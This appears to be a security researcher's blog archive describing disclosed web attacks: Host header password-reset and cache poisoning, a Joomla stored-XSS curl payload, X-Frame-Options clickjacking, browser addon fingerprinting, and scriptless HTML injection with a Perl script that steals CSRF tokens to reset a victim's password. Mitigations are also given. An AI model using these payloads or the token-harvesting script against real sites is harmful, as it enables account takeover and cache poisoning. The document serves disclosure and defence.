Wednesday, 18 February 2015

Exploiting Path Relative Style-Sheet Imports (PRSSI)

I've posted a detailed breakdown of how to successfully exploit path-relative stylesheet imports and navigate the associated pitfalls over at


Saturday, 30 August 2014

Comma Separated Vulnerabilities

My latest research, on exploiting spreadsheet-export functionality to attack users via malicious formulae, is over at:

Please note I no longer work at Context.

Wednesday, 1 May 2013

Practical HTTP Host header attacks

    Password reset and web-cache poisoning

        (And a little surprise in RFC-2616)


How does a deployable web application know where it is? Creating a trustworthy absolute URI is trickier than it sounds. Developers often resort to the exceedingly untrustworthy HTTP Host header ($_SERVER['HTTP_HOST'] in PHP). Even otherwise-secure applications trust this value enough to write it to the page without HTML-encoding it, with code equivalent to:
     <link href="http://_SERVER['HOST']"    (Joomla)

...and append secret keys and tokens to links containing it:
    <a href="http://_SERVER['HOST']?token=topsecret">  (Django, Gallery, others)

....and even directly import scripts from it:
      <script src="http://_SERVER['HOST']/misc/jquery.js?v=1.4.4">  (Various)

    There are two main ways to exploit this trust in regular web applications. The first approach is web-cache poisoning; manipulating caching systems into storing a page generated with a malicious Host and serving it to others. The second technique abuses alternative channels like password reset emails where the poisoned content is delivered directly to the target. In this post I'll look at how to exploit each of these in the presence of 'secured' server configurations, and how to successfully secure applications and servers.

Password reset poisoning

    Popular photo-album platform Gallery uses a common approach to forgotten password functionality. When a user requests a password reset it generates a (now) random key:

Places it in a link to the site:

and emails to the address on record for that user. [Full code] When the user visits the link, the presence of the key proves that they can read content sent to the email address, and thus must be the rightful owner of the account.
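The vulnerable pattern is easy to sketch. Here's a minimal Python illustration (function and host names are hypothetical, not Gallery's actual code): the reset link's origin comes from the attacker-controllable Host header, so the secret key travels wherever the attacker points it.

```python
import secrets

def build_reset_link(request_host: str, key: str) -> str:
    # Vulnerable pattern: derive the absolute URL from the incoming
    # request's Host header instead of a configured site name.
    return f"http://{request_host}/password/confirm?key={key}"

key = secrets.token_hex(16)

# A victim-triggered reset uses the legitimate Host...
legit = build_reset_link("gallery.example", key)

# ...but the attacker controls the Host header on the request that
# triggers the email, so the victim receives a hijacked link.
poisoned = build_reset_link("attacker.example", key)
```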

The vulnerability was that url::abs_site used the Host header provided by the person requesting the reset, so an attacker could trigger password reset emails poisoned with a hijacked link by tampering with their Host header:
> POST /password/reset HTTP/1.1
> Host:
> ...
> csrf=1e8d5c9bceb16667b1b330cc5fd48663&name=admin

    This technique also worked on Django, Piwik and Joomla, and still works on a few other major applications, frameworks and libraries that I can't name due to an unfortunate series of mistakes on my part.

Of course, this attack will fail unless the target clicks the poisoned link in the unexpected password reset email. There are some techniques for encouraging this click but I'll leave those to your imagination.

In other cases, the Host may be URL-decoded and placed directly into the email headers, allowing mail header injection. Using this, attackers can easily hijack accounts by BCCing password reset emails to themselves - Mozilla Persona had an issue somewhat like this, back in alpha. Even if the application's mailer ignores attempts to BCC other email addresses directly, it's often possible to bounce the email to another address by injecting \r\nReturn-Path: followed by an attachment engineered to trigger a bounce, such as a zip bomb.
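A toy Python sketch of the header-injection variant (the hostnames and mailer code are assumptions, not any real application's): URL-decoding the Host header before it reaches the raw message headers lets encoded CRLFs smuggle in extra headers.

```python
from urllib.parse import unquote

def build_mail_headers(host: str, user_email: str) -> str:
    # Vulnerable pattern: the URL-decoded Host header is concatenated
    # into the raw message headers without stripping CR/LF.
    decoded = unquote(host)
    return (f"To: {user_email}\r\n"
            f"Subject: Password reset for {decoded}\r\n")

evil_host = "example.com%0d%0aBcc:%20attacker@evil.example"
headers = build_mail_headers(evil_host, "victim@example.com")
# The injected CRLF smuggles a Bcc: header into the outgoing email.
```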

Cache poisoning

Web-cache poisoning using the Host header was first raised as a potential attack vector by Carlos Bueno in 2008. Five years later, there's no shortage of sites implicitly trusting the Host header, so I'll focus on the practicalities of poisoning caches. Such attacks are often difficult, as all modern standalone caches are Host-aware; they will never assume that the following two requests reference the same resource:

> GET /index.html HTTP/1.1
> Host:

> GET /index.html HTTP/1.1
> Host:

So, to persuade a cache to serve our poisoned response to someone else, we need to create a disconnect between the Host header the cache sees and the Host header the application sees. In the case of the popular caching solution Varnish, this can be achieved using duplicate Host headers. Varnish uses the first Host header it sees to identify the request, but Apache concatenates all Host headers present and Nginx uses the last Host header[1]. This means that you can poison a Varnish cache with URLs pointing at by making the following request:
> GET / HTTP/1.1
> Host:
> Host:
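The disagreement can be modelled in a few lines of Python (hostnames hypothetical): the cache keys on the first Host header while the backend builds the page from the last one, so the poisoned page is filed under the victim's hostname.

```python
def first_host(headers):
    # How, per the behaviour described above, Varnish keys the request.
    return next(v for k, v in headers if k.lower() == "host")

def last_host(headers):
    # How, per the behaviour described above, Nginx picks the Host value.
    return [v for k, v in headers if k.lower() == "host"][-1]

headers = [("Host", "victim.example"), ("Host", "attacker.example")]

cache_key = first_host(headers)    # response cached under victim.example
backend_host = last_host(headers)  # page generated for attacker.example
```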
Application-level caches can also be susceptible. Joomla writes the Host header to every page without HTML-encoding it, and its cache is entirely oblivious to the Host header. Gaining persistent XSS on the homepage of a Joomla installation was as easy as:
curl -H "Host: cow\"onerror='alert(1)'rel='stylesheet'" | fgrep cow\"

This will create the following request:
> GET / HTTP/1.1
> Host: cow"onerror='alert(1)'rel='stylesheet'

The response should show a poisoned <link> element:
<link href="http://cow"onerror='alert(1)'rel='stylesheet'/" rel="canonical"/>
To verify that the cache has been poisoned, just load the homepage in a browser and observe the popup.

'Secured' configurations

So far I've assumed that you can make an HTTP request with an arbitrary Host header arrive at any application. Given that the intended purpose of the Host header is to ensure that a request is passed to the correct application at a given IP address, it's not always that simple.

Sometimes it is trivial. If Apache receives an unrecognized Host header, it passes the request to the first virtual host defined in httpd.conf, so it's possible to send requests with arbitrary Host headers directly to a sizable number of applications. Django was aware of this default-vhost risk and responded by advising users to create a dummy default vhost to act as a catch-all, ensuring that Django applications never received requests with unexpected Host headers.

The first bypass for this used X-Forwarded-For's friend, the X-Forwarded-Host header, which effectively overrode the Host header. Django was aware of the cache-poisoning risk and fixed this issue in September 2011 by disabling support for the X-Forwarded-Host header by default. Mozilla neglected to apply this update, which I discovered in April 2012 with the following request:
> POST /en-US/firefox/user/pwreset HTTP/1.1
> Host:
> X-Forwarded-Host:

Even patched Django installations were still vulnerable to attack. Webservers allow a port to be specified in the Host header, but ignore it for the purpose of deciding which virtual host to pass the request to. This is simple to exploit using the ever-useful syntax:
> POST /en-US/firefox/user/pwreset HTTP/1.1
> Host:

This resulted in the following (admittedly suspicious) password reset link:

If you click it, you'll notice that your browser sends the key to before creating the suspicious URL popup. Django released a patch for this issue shortly after I reported it:

Unfortunately, Django's patch simply used a blacklist to filter @ and a few other characters. As the password reset email is sent in plaintext rather than HTML, a space breaks the URL into two separate links:

> POST /en-US/firefox/users/pwreset HTTP/1.1
> Host:
Django's follow-up patch ensured that the port specification in the Host header could only contain numbers, preventing the port-based attack entirely. However, the arguably ultimate authority on virtual hosting, RFC 2616, has the following to say:

5.2 The Resource Identified by a Request
If Request-URI is an absoluteURI, the host is part of the Request-URI. Any Host header field value in the request MUST be ignored.

The result? On Apache and Nginx (and all compliant servers) it's possible to route requests with arbitrary Host headers to any application present by using an absolute URI:
> Host:
This request results in a SERVER_NAME of but an HTTP['HOST'] of Applications that use SERVER_NAME rather than HTTP['HOST'] are unaffected by this particular trick, but can still be exploited on common server configurations. See HTTP_HOST vs. SERVER_NAME for more information on the difference between these two variables. Django fixed this in February 2013 by enforcing a whitelist of allowed hosts; see the documentation for more details. However, these attack techniques still work fine on many other web applications.
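The routing trick can be sketched as a small Python model of RFC 2616's rule (server behaviour simplified, hostnames hypothetical): a compliant backend takes the host from an absolute Request-URI and ignores the Host header that the front-end routed on.

```python
from urllib.parse import urlsplit

def effective_host(request_uri: str, host_header: str) -> str:
    # RFC 2616 section 5.2: if the Request-URI is an absoluteURI, the
    # host is part of it and any Host header value MUST be ignored.
    if request_uri.lower().startswith(("http://", "https://")):
        return urlsplit(request_uri).hostname
    return host_header

routed_on = "victim.example"  # what the vhost routing and cache saw
seen_by_app = effective_host("http://attacker.example/reset", routed_on)
```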

Securing servers

Due to the aforementioned absolute request URI technique, making the Host header itself trustworthy is almost a lost cause. What you can do is make SERVER_NAME trustworthy. This can be achieved under Apache (instructions) and Nginx (instructions) by creating a dummy vhost that catches all requests with unrecognized Host headers. It can also be done under Nginx by specifying a non-wildcard server_name, and under Apache by using a non-wildcard ServerName and turning the UseCanonicalName directive on. I'd recommend using both approaches wherever possible.

A patch for Varnish should be released shortly. As a workaround until then, you can add the following to the config file:
        import std;

        sub vcl_recv {
            # Collapse duplicate Host headers into one, so the cache and
            # the backend agree on which host the request is for.
            std.collect(req.http.Host);
        }

Securing applications

Fixing this issue is difficult, as there is no entirely automatic way to identify which host names the administrator trusts. The safest, albeit mildly inconvenient solution, is to use Django's approach of requiring administrators to provide a whitelist of trusted domains during the initial site setup process. If that is too drastic, at least ensure that SERVER_NAME is used instead of the Host header, and encourage users to use a secure server configuration.
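A whitelist check in the spirit of Django's fix might look like this (a sketch with illustrative hostnames, not Django's actual implementation):

```python
ALLOWED_HOSTS = {"example.com", "www.example.com"}  # illustrative

def is_trusted_host(host: str) -> bool:
    # Strip an optional numeric port, then require an exact whitelist
    # match. (IPv6 literals are omitted for brevity.)
    name, sep, port = host.partition(":")
    if sep and not port.isdigit():
        return False  # e.g. a smuggled '@' or extra colon in the "port"
    return name.lower() in ALLOWED_HOSTS
```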

Further research

  • More effective / less inconvenient fixes
  • Automated detection
  • Exploiting wildcard whitelists with XSS & window.history
  • Exploiting multipart password reset emails by predicting boundaries
  • Better cache fuzzing (trailing Host headers?)

Thanks to Mozilla for funding this research via their bug-bounty program, Varnish for the handy workaround, and the teams behind Django, Gallery, and Joomla for their speedy patches.

For a discussion of automated detection of this issue, and a demo of web-cache poisoning against Typo3,  see the following video from OWASP AppSec EU: ActiveScan++: Augmenting manual testing with attack proxy plugins.

Feel free to drop a comment, email or DM me if you have any observations or queries.

Saturday, 2 June 2012

X-Frame-Options gotcha

Summary: X-Frame-Options: SAMEORIGIN validates window.top, not window.parent. This is bad news for sites that frame untrusted content.

UI-Redressing or 'Clickjacking' attacks rely on loading the target page in an iframe. The standard defence against them is to deny framing by using the X-Frame-Options (XFO) server header. Unfortunately there is a slight quirk in this feature's implementation which has left some sites vulnerable to clickjacking in spite of their use of XFO.

The problem is with the SAMEORIGIN flag. Intuitively, it sounds like it means 'Only pages from the same origin can frame this'. What it actually means is 'This page can only be framed when window.top is of the same origin'. window.parent does not have to be of the same origin. This is significant if your website frames untrusted/external pages. Let's use an example: uses X-Frame-Options: SAMEORIGIN to protect itself. It also loads a page in a sandboxed iframe. tries to perform a clickjacking attack but is thwarted by the XFO header. Web browsers will see the flag and refuse to load the iframe, so clicking the green circle will have no effect.

However, if the target site can be cajoled into iframing the attack page, we have a problem:

The fix is simple: if you must iframe untrusted content, use the DENY flag instead of SAMEORIGIN.
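A toy Python model of the check described above (real browser behaviour varies, and modern specs have since moved to CSP's frame-ancestors; origins here are hypothetical):

```python
def may_render(xfo: str, top_origin: str, frame_origin: str) -> bool:
    # SAMEORIGIN compares the framed page's origin against window.top's
    # origin only -- intermediate parent frames are never consulted.
    flag = xfo.strip().upper()
    if flag == "DENY":
        return False
    if flag == "SAMEORIGIN":
        return top_origin == frame_origin
    return True  # no recognised XFO header: framing allowed

# victim frames attacker, attacker re-frames victim: top is victim,
# so SAMEORIGIN happily lets the innermost victim frame render.
nested_ok = may_render("SAMEORIGIN", "https://victim.example",
                       "https://victim.example")
```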

Update: see clickjacking google for a couple of real attacks using this technique.

Tuesday, 20 December 2011

Phrack ebook

I've converted all 25 years of Phrack magazine into an ebook suitable for viewing on e-readers: (Kindles)

phrack.epub (Other e-readers)

The conversion wasn't perfect; text and code are fine but some of the ASCII diagrams have been horribly mangled. I outright stripped base64-encoded tgz/png attachments. This is a work in progress; I will update it whenever I feel like some heart-withering text-processing.

If you would like to roll your own version, download the epub generation code or the mobi version. They should run on all *nix distros with the requisite Perl modules. Both versions actually generate epubs, but the second can be easily converted into a .mobi using Kindlegen.

Redistributed with permission. Rights remain with

update #1: I have manually added issue 68 to the download. The generation code should work once Phrack updates p68.tar.gz

update #2: Fixed a zip layout mistake that broke compatibility with Stanza

update #3: eridius restructured the .epub so it should genuinely work in all e-readers now.

Friday, 1 July 2011

Sparse Bruteforce Addon Detection

This post demonstrates a technique for discovering which browser addons/extensions people who visit your website have installed. This could be used for fingerprinting, compatibility purposes or pre-exploit reconnaissance.

Chrome demo (Detects top 1000 extensions)
Backing script

Firefox demo (Detects ~10% of top 1000 addons)
Backing script

Both demos use the well-known technique of:
<img/script src='chrome://[imageFromAddon]' onload='addonExists=true' onerror='addonExists=false'>

The Firefox demo was generated using a Python script that inspects the chrome.manifest of each addon for 'contentaccessible=yes', then loads the addon's install.rdf and extracts the chrome:// URI of the addon's icon. The Chrome script is extremely simple; it merely detects the manifest.json that all Chrome extensions have. Both scripts can also be used to generate detection code for addons by search keyword.
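The generated probes boil down to string templating. A minimal Python sketch (the handler names and resource path are made up; it mirrors the tag pattern shown above):

```python
def detection_tag(addon_id: str, resource: str) -> str:
    # Emit a probe tag: the load handler fires only when the browser can
    # actually fetch the addon-internal resource, revealing its presence.
    uri = f"chrome://{addon_id}/{resource}"
    return (f"<img src='{uri}' "
            f"onload='found(\"{addon_id}\")' "
            f"onerror='missing(\"{addon_id}\")'>")

tag = detection_tag("someaddon", "content/icon.png")
```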

Update: For a technical explanation & more elegant implementation see

Update #2: Firefox addons can also be detected without javascript; see
The PoC on that page no longer works; here's one that does:

Saturday, 28 May 2011

JS-less XSS

Using HTML Injection to hijack accounts without JavaScript.
Sometimes using javascript isn't an option. Maybe the target website uses the new Content Security Policy (CSP) header to prevent script execution, or perhaps the target user has NoScript. At the moment CSP is extremely rare (only used by mobile Twitter and only supported by Firefox 4) but it may become widespread in the future. After all, with CSP "the bar for a successful attack is placed much, much higher" ;) The techniques here are not a CSP bypass, but a workaround.

Since I couldn't find an XSS in mobile Twitter in 5 minutes, I've hashed together a couple of extremely simple demo pages that use CSP and are vulnerable to XSS. See if you can work out how to make a payload to hijack an account. If you aren't using FF4, just try to write a scriptless payload.

Example Site One------------------Exploit via IMG
This exploit is quite stealthy; unless you intercept your browser's requests, you might not realise the password has been changed. The injected unclosed IMG tag results in the victim's browser making a request like GET [theEntirePageAfterTheInjectionPoint] The attacker's server extracts the 'csrftoken' value from that GET request and places it into a 302 Found response like:

302 Found

So your browser dutifully performs
And that's it; the page will see the correct token and update the password.

The code behind is very simple:

#!/usr/bin/perl
use strict;
use warnings;
use CGI ':standard';

my $tok = param('s');                      # everything after the injection point
if ($tok =~ m/csrftoken.*value="([0-9]*)/) { $tok = $1; } # extract the CSRF token
my $ref = $ENV{HTTP_REFERER};              # the vulnerable page the victim came from
$ref =~ s/\?.*//g;                         # strip any query string from the referer
print header(-Status=>'302 Found', -Location=>$ref.'?pass1=evilpassword&pass2=evilpassword&csrftoken='.$tok);

If the request you want to forge is POST only, try <iframe src=' to grab the token instead, and put an autosubmitting form in the iframe'd page.
Example Site Two------------------Exploit via FORM/TEXTBOX
This exploit is a lot less subtle. It requires user interaction, and triggers NoScript's XSS filter. However, the <form> <textbox> approach is much more likely to capture the whole web page, and won't be upset by a single ' or ".

The demo doesn't show it, but a token harvested from one page can often be used for any form on the website, and re-used indefinitely. Thus, just like with normal XSS, the injection doesn't have to be on the page with the form you want to forge. Another interesting alternative to harvesting tokens is UI-redressing attacks like clickjacking, since many anti-framing techniques allow framing when the host domain matches the framed domain.

Finally, I'm sure there are plenty more entertaining and robust ways of hijacking accounts without javascript/flash/java. I'll try to keep this page updated with the latest.

See also:
Sniffing saved passwords (still works):